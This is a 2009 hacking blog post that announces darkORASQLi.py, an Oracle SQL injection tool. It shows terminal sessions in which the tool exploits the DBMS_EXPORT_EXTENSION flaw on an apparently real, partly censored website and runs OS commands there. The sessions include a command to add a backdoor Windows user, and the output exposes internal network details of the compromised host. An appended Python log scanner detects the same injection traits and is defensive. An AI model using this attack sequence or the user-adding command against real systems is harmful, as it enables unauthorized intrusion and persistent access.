Sunday, November 29, 2009

Multi Purpose Oracle SQL Injection Tool with darkORASQLi.py

After successfully developing a PostgreSQL injection tool, darkc0de will release a new tool for Oracle SQL injection. If you have ever heard of darkMYSQLi, darkMSSQLi, or darkPGSQLi, I think this tool will be useful for you all, especially penetration testers or security consultants. This tool is 80% working and will be released later.


angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[somevulnsite]/detail.jsp?id=1001039735'" --pwn
|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[somevulnsite]/detail.jsp?id=1001039735'
[+] 10:47:52
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored].WORLD
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command
[+] Sending our ^EVIL^ payloads:

[+] Stage 1: Creating Java Library [ OK ]
[+] Stage 2: Granting Java Execute Privileges [ OK ]
[+] Stage 3: Creating Function for Command Execution [ OK ]
[+] Stage 3: Making Function Executable by All Users [ OK ]

[+] If all OK you should now can exec command with --cmd option
[+] Example:

[+] Windows
[+] --cmd "cmd.exe /c net user d3ck4 d4rkc0d3rz /add"

[+] UNIX/Linux
[+] --cmd "/bin/uname -a"




--cmd "/bin/uname -a"

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/bin/uname -a"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:46:54
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /bin/uname -a
Linux asahan 2.6.9-22.ELsmp #1 SMP Mon Sep 19 18:00:54 EDT 2005 x86_64 x86_64 x86_64 GNU/Linux

[-] 10:46:55
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log




--cmd "/sbin/ifconfig"


angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/sbin/ifconfig"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:33:57
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DC
inet addr:10.100.88.31 Bcast:10.100.88.255 Mask:255.255.255.0
inet6 addr: 2001:e68:2000:6458:211:25ff:fec4:dddc/64 Scope:Global
inet6 addr: fe80::211:25ff:fec4:dddc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:351166911 errors:0 dropped:0 overruns:0 frame:0
TX packets:393842969 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:63516816827 (59.1 GiB) TX bytes:231324821682 (215.4 GiB)
Interrupt:201

eth1 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DD
inet6 addr: fe80::211:25ff:fec4:dddd/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:209

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:948943 errors:0 dropped:0 overruns:0 frame:0
TX packets:948943 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:93467115 (89.1 MiB) TX bytes:93467115 (89.1 MiB)

[-] 10:34:04
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log

20% to go.. till then, keep r0x darkc0de!
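
A defender-side counterpart to the sessions above, added here as an example (it is not part of the original post or of darkORASQLi.py): it scans web access logs for the request traits visible in the tool output, namely the quote after the numeric id, the trailing `--` comment, the DBMS_EXPORT_EXTENSION package name, and a changing User-Agent from one client. The Combined Log Format, the `id` parameter name, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Combined Log Format (assumed): ip - - [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)

# Indicators derived from the tool output on this page; 'id' is the parameter in its URL.
INDICATORS = {
    "oracle_export_extension": re.compile(r"DBMS_EXPORT_EXTENSION", re.I),
    "quote_in_numeric_id": re.compile(r"(?:^|&)id=\d+'"),
    "trailing_sql_comment": re.compile(r"--\s*$"),
}

def decode_query(target, rounds=2):
    """Return the query string, URL-decoded up to `rounds` times ('+' becomes a space)."""
    query = urlsplit(target).query
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def scan(lines):
    """Return (hits, rotating): flagged requests and flagged IPs seen with >1 User-Agent."""
    hits, agents = [], defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not Combined Log Format, skip
        query = decode_query(m["target"])
        found = [name for name, rx in INDICATORS.items() if rx.search(query)]
        if found:
            hits.append((m["ip"], found))
            agents[m["ip"]].add(m["agent"])
    rotating = {ip for ip, seen in agents.items() if len(seen) > 1}
    return hits, rotating

# Constructed sample log lines (not from the page); the payload body is elided.
SAMPLE = [
    '198.51.100.7 - - [29/Nov/2009:10:30:00 +0800] "GET /detail.jsp?id=1001039735 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [29/Nov/2009:10:46:54 +0800] "GET /detail.jsp?id=1001039735%27+-- HTTP/1.1" 500 312 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"',
    '203.0.113.9 - - [29/Nov/2009:10:46:55 +0800] "GET /detail.jsp?id=1001039735%2527+DBMS_EXPORT_EXTENSION.ELIDED+-- HTTP/1.1" 200 901 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"',
]
```

Calling `scan(SAMPLE)` returns the flagged requests with their matched indicator names and the set of client IPs whose flagged requests carried more than one User-Agent.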
